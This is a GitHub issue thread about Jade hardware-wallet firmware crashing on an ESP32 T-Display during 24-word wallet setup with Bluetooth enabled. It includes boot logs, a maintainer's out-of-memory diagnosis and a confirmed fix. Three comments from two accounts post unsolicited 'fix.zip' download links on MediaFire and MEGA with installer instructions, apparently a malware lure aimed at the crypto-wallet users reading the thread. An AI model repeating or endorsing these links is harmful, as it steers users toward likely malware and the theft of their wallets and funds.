Blockstream/Jade #155: [TT-Display] Crashing while creating/restoring 24word wallet with BT on

victorfclima, 2024-08-24:
There is a bug when using Jade on T-Display (ESP32) in the current version (1.0.31). If bluetooth is on, when you are creating or retrieving a 24 word wallet, the software crashes and then reboots. I took a look at the terminal and I can identify two different types of errors every time it reboots.

**Error 01:**

`�clogX@E (431053) ./main/utils/malloc_ext.h: 59: Assertion failed: ptr
�clogXIE (431053) ./main/utils/malloc_ext.h: 59: calloc fets Jun  8 2016 00:22:57

rst:0x7 (TG0WDT_SYS_RESET),boot:0x13 (SPI_FAST_FLASH_BOOT)
configsip: 0, SPIWP:0xee
clk_drv:0x00,q_drv:0x00,d_drv:0x00,cs0_drv:0x00,hd_drv:0x00,wp_drv:0x00
mode:DIO, clock div:2
load:0x3fff0140,len:1760
load:0x40078000,len:15784
load:0x40080400,len:4
0x40080400: _init at ??:?

ho 8 tail 4 room 4
load:0x40080404,len:2916
entry 0x4008056c`

[image]

-----------------

**Error 02:**
`�clogX>E (388173) ./main/gui.c: 2539: Assertion failed: rc == ESP_OK
�clogXAE (388173) ./main/storage.c: 184: nvs_open() for PINets Jun  8 2016 00:22:57

rst:0xc (SW_CPU_RESET),boot:0x13 (SPI_FAST_FLASH_BOOT)
configsip: 0, SPIWP:0xee
clk_drv:0x00,q_drv:0x00,d_drv:0x00,cs0_drv:0x00,hd_drv:0x00,wp_drv:0x00
mode:DIO, clock div:2
load:0x3fff0140,len:1760
load:0x40078000,len:15784
load:0x40080400,len:4
0x40080400: _init at ??:?

ho 8 tail 4 room 4
load:0x40080404,len:2916
entry 0x4008056c`

[image]

-----------------

Hope that helps to improve something.

1v9Cidjei, 2024-08-24:
I had the same problem with unexpected crashes and resets, even running a firmware that disables BT by default.

diablo00001, 2024-08-25:
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

Zoraaa-z, 2024-08-25:
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

Zoraaa-z, 2024-08-25:
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

Sandmann21s, 2024-08-26:
Hi,

I'm experiencing the same issue. I managed to work around it slightly, but the bugs are still present. I have a playlist of videos showing how I handled it before version 1.0.31, when these errors didn't occur.

You can check it out here: [Playlist]
https://www.youtube.com/watch?v=9uYB0J3HjXI&list=PLA4zSdkiiEbt1fxRJsJXgx_ckz5MFiKj4&index=2

Hope this helps!

JamieDriver, 2024-09-03:
`malloc_ext.h: 59: Assertion failed: ptr`
suggests the device is out of memory.

I'll try to take a look.

JamieDriver, 2024-09-06:
Should have a PR/branch for you to test out early next week.

victorfclima, 2024-09-07:
> Should have a PR/branch for you to test out early next week.

Thank you for that Jamie! Best regards.

JamieDriver, 2024-09-10:
If you're up for it, give [this branch](https://github.com/Blockstream/Jade/tree/reduce_mem_use) a spin.  
Hopefully it resolves the memory issues.

JamieDriver, 2024-09-12:
Merged to master.  Please close if you agree resolved.  Thanks.

victorfclima, 2024-09-14:
> Merged to master. Please close if you agree resolved. Thanks.

Hey Jamie, sorry for the late. Just tested now and its all working well. Thank you for you attention!

Gonna close this topic.

closed 2024-09-14 by victorfclima